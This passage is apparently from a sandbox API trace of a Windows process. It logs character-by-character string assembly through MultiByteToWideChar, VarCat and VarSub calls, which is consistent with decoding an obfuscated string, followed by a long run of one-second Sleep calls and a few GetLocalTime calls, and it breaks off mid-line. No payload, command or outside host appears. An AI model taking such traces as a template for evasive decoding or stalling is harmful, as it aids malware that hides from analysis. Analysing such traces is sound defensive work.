pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0202.343] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.343] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0202.344] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.344] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0202.345] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.345] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0202.346] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.347] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0202.347] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.348] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0202.348] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.349] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0202.349] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.350] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0202.350] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.353] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0202.354] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.354] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0202.355] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.355] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0202.356] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.356] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0202.357] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.357] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.358] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.358] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.359] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.359] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0202.360] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.360] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.361] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.361] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.362] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.362] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0202.363] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.364] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.364] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.365] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.365] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.366] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 Thread: id = 56 os_tid = 0xfdc [0131.707] GetCurrentThreadId () returned 0xfdc [0131.707] GetTickCount () returned 0x1d0a433 [0131.707] Sleep (dwMilliseconds=0x3e8) [0133.624] Sleep (dwMilliseconds=0x3e8) [0135.206] Sleep (dwMilliseconds=0x3e8) [0136.237] Sleep (dwMilliseconds=0x3e8) [0137.471] Sleep (dwMilliseconds=0x3e8) [0138.649] Sleep (dwMilliseconds=0x3e8) [0139.716] Sleep (dwMilliseconds=0x3e8) [0140.781] Sleep (dwMilliseconds=0x3e8) [0141.793] Sleep (dwMilliseconds=0x3e8) [0142.856] Sleep (dwMilliseconds=0x3e8) [0143.945] Sleep (dwMilliseconds=0x3e8) [0145.178] Sleep (dwMilliseconds=0x3e8) [0146.427] Sleep (dwMilliseconds=0x3e8) [0147.448] Sleep (dwMilliseconds=0x3e8) [0148.473] Sleep (dwMilliseconds=0x3e8) [0153.934] Sleep (dwMilliseconds=0x3e8) [0157.028] Sleep (dwMilliseconds=0x3e8) [0160.020] Sleep (dwMilliseconds=0x3e8) [0162.853] Sleep (dwMilliseconds=0x3e8) [0164.244] Sleep (dwMilliseconds=0x3e8) [0165.283] Sleep (dwMilliseconds=0x3e8) [0165.331] Sleep (dwMilliseconds=0x3e8) [0165.375] Sleep (dwMilliseconds=0x3e8) [0165.427] Sleep (dwMilliseconds=0x3e8) [0165.475] Sleep (dwMilliseconds=0x3e8) [0165.535] Sleep (dwMilliseconds=0x3e8) [0165.649] Sleep (dwMilliseconds=0x3e8) [0165.703] Sleep (dwMilliseconds=0x3e8) [0165.793] Sleep (dwMilliseconds=0x3e8) [0165.863] Sleep (dwMilliseconds=0x3e8) [0165.877] Sleep (dwMilliseconds=0x3e8) [0165.972] Sleep (dwMilliseconds=0x3e8) [0166.021] Sleep (dwMilliseconds=0x3e8) [0166.040] Sleep (dwMilliseconds=0x3e8) [0166.097] Sleep (dwMilliseconds=0x3e8) [0166.294] Sleep (dwMilliseconds=0x3e8) [0166.332] Sleep (dwMilliseconds=0x3e8) [0166.461] Sleep (dwMilliseconds=0x3e8) [0166.586] Sleep (dwMilliseconds=0x3e8) [0166.813] Sleep (dwMilliseconds=0x3e8) [0166.924] Sleep (dwMilliseconds=0x3e8) [0167.027] Sleep (dwMilliseconds=0x3e8) [0167.267] Sleep (dwMilliseconds=0x3e8) [0167.379] Sleep (dwMilliseconds=0x3e8) [0167.486] Sleep (dwMilliseconds=0x3e8) [0167.626] Sleep (dwMilliseconds=0x3e8) [0167.763] Sleep (dwMilliseconds=0x3e8) [0167.857] Sleep (dwMilliseconds=0x3e8) [0168.000] Sleep (dwMilliseconds=0x3e8) [0168.251] Sleep (dwMilliseconds=0x3e8) [0168.453] Sleep (dwMilliseconds=0x3e8) [0168.735] Sleep (dwMilliseconds=0x3e8) [0168.921] Sleep (dwMilliseconds=0x3e8) [0169.248] Sleep (dwMilliseconds=0x3e8) [0169.436] Sleep (dwMilliseconds=0x3e8) [0169.577] Sleep (dwMilliseconds=0x3e8) [0169.685] Sleep (dwMilliseconds=0x3e8) [0169.779] Sleep (dwMilliseconds=0x3e8) [0169.873] Sleep (dwMilliseconds=0x3e8) [0169.967] Sleep (dwMilliseconds=0x3e8) [0170.097] Sleep (dwMilliseconds=0x3e8) [0170.201] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x6, wMilliseconds=0x2b)) [0170.201] Sleep (dwMilliseconds=0x3e8) [0170.293] Sleep (dwMilliseconds=0x3e8) [0170.482] Sleep (dwMilliseconds=0x3e8) [0170.590] Sleep (dwMilliseconds=0x3e8) [0170.640] Sleep (dwMilliseconds=0x3e8) [0170.768] Sleep (dwMilliseconds=0x3e8) [0170.864] Sleep (dwMilliseconds=0x3e8) [0170.918] Sleep (dwMilliseconds=0x3e8) [0170.981] Sleep (dwMilliseconds=0x3e8) [0171.044] Sleep (dwMilliseconds=0x3e8) [0171.153] Sleep (dwMilliseconds=0x3e8) [0171.198] Sleep (dwMilliseconds=0x3e8) [0171.317] Sleep (dwMilliseconds=0x3e8) [0171.403] Sleep (dwMilliseconds=0x3e8) [0171.465] Sleep (dwMilliseconds=0x3e8) [0171.527] Sleep (dwMilliseconds=0x3e8) [0171.594] Sleep (dwMilliseconds=0x3e8) [0171.650] Sleep (dwMilliseconds=0x3e8) [0171.734] Sleep (dwMilliseconds=0x3e8) [0171.907] Sleep (dwMilliseconds=0x3e8) [0171.922] Sleep (dwMilliseconds=0x3e8) [0171.932] Sleep (dwMilliseconds=0x3e8) [0171.948] Sleep (dwMilliseconds=0x3e8) [0171.968] Sleep (dwMilliseconds=0x3e8) [0172.299] Sleep (dwMilliseconds=0x3e8) [0172.517] Sleep (dwMilliseconds=0x3e8) [0172.698] Sleep (dwMilliseconds=0x3e8) [0172.793] Sleep (dwMilliseconds=0x3e8) [0172.929] Sleep (dwMilliseconds=0x3e8) [0173.022] Sleep (dwMilliseconds=0x3e8) [0173.157] Sleep (dwMilliseconds=0x3e8) [0173.307] Sleep (dwMilliseconds=0x3e8) [0173.406] Sleep (dwMilliseconds=0x3e8) [0173.640] Sleep (dwMilliseconds=0x3e8) [0173.901] Sleep (dwMilliseconds=0x3e8) [0174.200] Sleep (dwMilliseconds=0x3e8) [0174.267] Sleep (dwMilliseconds=0x3e8) [0174.319] Sleep (dwMilliseconds=0x3e8) [0174.713] Sleep (dwMilliseconds=0x3e8) [0174.912] Sleep (dwMilliseconds=0x3e8) [0175.149] Sleep (dwMilliseconds=0x3e8) [0175.350] Sleep (dwMilliseconds=0x3e8) [0175.600] Sleep (dwMilliseconds=0x3e8) [0175.886] Sleep (dwMilliseconds=0x3e8) [0176.160] Sleep (dwMilliseconds=0x3e8) [0176.348] Sleep (dwMilliseconds=0x3e8) [0176.537] Sleep (dwMilliseconds=0x3e8) [0176.595] Sleep (dwMilliseconds=0x3e8) [0176.620] Sleep (dwMilliseconds=0x3e8) [0176.738] Sleep (dwMilliseconds=0x3e8) [0176.782] Sleep (dwMilliseconds=0x3e8) [0176.897] Sleep (dwMilliseconds=0x3e8) [0176.985] Sleep (dwMilliseconds=0x3e8) [0177.253] Sleep (dwMilliseconds=0x3e8) [0177.362] Sleep (dwMilliseconds=0x3e8) [0177.471] Sleep (dwMilliseconds=0x3e8) [0177.716] Sleep (dwMilliseconds=0x3e8) [0177.766] Sleep (dwMilliseconds=0x3e8) [0177.779] Sleep (dwMilliseconds=0x3e8) [0177.816] Sleep (dwMilliseconds=0x3e8) [0177.834] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x29f)) [0177.834] Sleep (dwMilliseconds=0x3e8) [0177.841] Sleep (dwMilliseconds=0x3e8) [0178.047] Sleep (dwMilliseconds=0x3e8) [0178.124] Sleep (dwMilliseconds=0x3e8) [0178.281] Sleep (dwMilliseconds=0x3e8) [0178.337] Sleep (dwMilliseconds=0x3e8) [0178.459] Sleep (dwMilliseconds=0x3e8) [0178.516] Sleep (dwMilliseconds=0x3e8) [0178.564] Sleep (dwMilliseconds=0x3e8) [0178.611] Sleep (dwMilliseconds=0x3e8) [0178.656] Sleep (dwMilliseconds=0x3e8) [0178.712] Sleep (dwMilliseconds=0x3e8) [0178.781] Sleep (dwMilliseconds=0x3e8) [0178.798] Sleep (dwMilliseconds=0x3e8) [0178.812] Sleep (dwMilliseconds=0x3e8) [0178.869] Sleep (dwMilliseconds=0x3e8) [0178.973] Sleep (dwMilliseconds=0x3e8) [0179.109] Sleep (dwMilliseconds=0x3e8) [0179.214] Sleep (dwMilliseconds=0x3e8) [0179.307] Sleep (dwMilliseconds=0x3e8) [0179.403] Sleep (dwMilliseconds=0x3e8) [0179.494] Sleep (dwMilliseconds=0x3e8) [0179.554] Sleep (dwMilliseconds=0x3e8) [0179.592] Sleep (dwMilliseconds=0x3e8) [0179.638] Sleep (dwMilliseconds=0x3e8) [0179.728] Sleep (dwMilliseconds=0x3e8) [0179.824] Sleep (dwMilliseconds=0x3e8) [0179.915] Sleep (dwMilliseconds=0x3e8) [0180.009] Sleep (dwMilliseconds=0x3e8) [0180.134] Sleep (dwMilliseconds=0x3e8) [0180.230] Sleep (dwMilliseconds=0x3e8) [0180.299] Sleep (dwMilliseconds=0x3e8) [0180.342] Sleep (dwMilliseconds=0x3e8) [0180.389] Sleep (dwMilliseconds=0x3e8) [0180.477] Sleep (dwMilliseconds=0x3e8) [0180.571] Sleep (dwMilliseconds=0x3e8) [0180.667] Sleep (dwMilliseconds=0x3e8) [0180.759] Sleep (dwMilliseconds=0x3e8) [0180.852] Sleep (dwMilliseconds=0x3e8) [0180.945] Sleep (dwMilliseconds=0x3e8) [0180.999] Sleep (dwMilliseconds=0x3e8) [0181.043] Sleep (dwMilliseconds=0x3e8) [0181.148] Sleep (dwMilliseconds=0x3e8) [0181.241] Sleep (dwMilliseconds=0x3e8) [0181.335] Sleep (dwMilliseconds=0x3e8) [0181.429] Sleep (dwMilliseconds=0x3e8) [0181.524] Sleep (dwMilliseconds=0x3e8) [0181.616] Sleep (dwMilliseconds=0x3e8) [0181.699] Sleep (dwMilliseconds=0x3e8) [0181.771] Sleep (dwMilliseconds=0x3e8) [0181.865] Sleep (dwMilliseconds=0x3e8) [0181.961] Sleep (dwMilliseconds=0x3e8) [0182.052] Sleep (dwMilliseconds=0x3e8) [0182.177] Sleep (dwMilliseconds=0x3e8) [0182.273] Sleep (dwMilliseconds=0x3e8) [0182.360] Sleep (dwMilliseconds=0x3e8) [0182.404] Sleep (dwMilliseconds=0x3e8) [0182.491] Sleep (dwMilliseconds=0x3e8) [0182.583] Sleep (dwMilliseconds=0x3e8) [0182.677] Sleep (dwMilliseconds=0x3e8) [0182.770] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x268)) [0182.770] Sleep (dwMilliseconds=0x3e8) [0182.864] Sleep (dwMilliseconds=0x3e8) [0182.959] Sleep (dwMilliseconds=0x3e8) [0183.055] Sleep (dwMilliseconds=0x3e8) [0183.191] Sleep (dwMilliseconds=0x3e8) [0183.286] Sleep (dwMilliseconds=0x3e8) [0183.376] Sleep (dwMilliseconds=0x3e8) [0183.505] Sleep (dwMilliseconds=0x3e8) [0183.893] Sleep (dwMilliseconds=0x3e8) [0184.143] Sleep (dwMilliseconds=0x3e8) [0184.347] Sleep (dwMilliseconds=0x3e8) [0184.411] Sleep (dwMilliseconds=0x3e8) [0184.455] Sleep (dwMilliseconds=0x3e8) [0184.503] Sleep (dwMilliseconds=0x3e8) [0184.581] Sleep (dwMilliseconds=0x3e8) [0184.690] Sleep (dwMilliseconds=0x3e8) [0184.737] Sleep (dwMilliseconds=0x3e8) [0184.784] Sleep (dwMilliseconds=0x3e8) [0184.846] Sleep (dwMilliseconds=0x3e8) [0184.907] Sleep (dwMilliseconds=0x3e8) [0184.958] Sleep (dwMilliseconds=0x3e8) [0185.001] Sleep (dwMilliseconds=0x3e8) [0185.049] Sleep (dwMilliseconds=0x3e8) [0185.141] Sleep (dwMilliseconds=0x3e8) [0185.188] Sleep (dwMilliseconds=0x3e8) [0185.235] Sleep (dwMilliseconds=0x3e8) [0185.283] Sleep (dwMilliseconds=0x3e8) [0185.328] Sleep (dwMilliseconds=0x3e8) [0185.376] Sleep (dwMilliseconds=0x3e8) [0185.422] Sleep (dwMilliseconds=0x3e8) [0185.485] Sleep (dwMilliseconds=0x3e8) [0185.533] Sleep (dwMilliseconds=0x3e8) [0185.578] Sleep (dwMilliseconds=0x3e8) [0185.626] Sleep (dwMilliseconds=0x3e8) [0185.674] Sleep (dwMilliseconds=0x3e8) [0185.719] Sleep (dwMilliseconds=0x3e8) [0185.765] Sleep (dwMilliseconds=0x3e8) [0185.816] Sleep (dwMilliseconds=0x3e8) [0185.867] Sleep (dwMilliseconds=0x3e8) [0185.908] Sleep (dwMilliseconds=0x3e8) [0185.945] Sleep (dwMilliseconds=0x3e8) [0186.172] Sleep (dwMilliseconds=0x3e8) [0186.314] Sleep (dwMilliseconds=0x3e8) [0186.431] Sleep (dwMilliseconds=0x3e8) [0186.472] Sleep (dwMilliseconds=0x3e8) [0186.577] Sleep (dwMilliseconds=0x3e8) [0186.720] Sleep (dwMilliseconds=0x3e8) [0186.813] Sleep (dwMilliseconds=0x3e8) [0186.859] Sleep (dwMilliseconds=0x3e8) [0186.951] Sleep (dwMilliseconds=0x3e8) [0187.044] Sleep (dwMilliseconds=0x3e8) [0187.169] Sleep (dwMilliseconds=0x3e8) [0187.263] Sleep (dwMilliseconds=0x3e8) [0187.312] Sleep (dwMilliseconds=0x3e8) [0187.388] Sleep (dwMilliseconds=0x3e8) [0187.430] Sleep 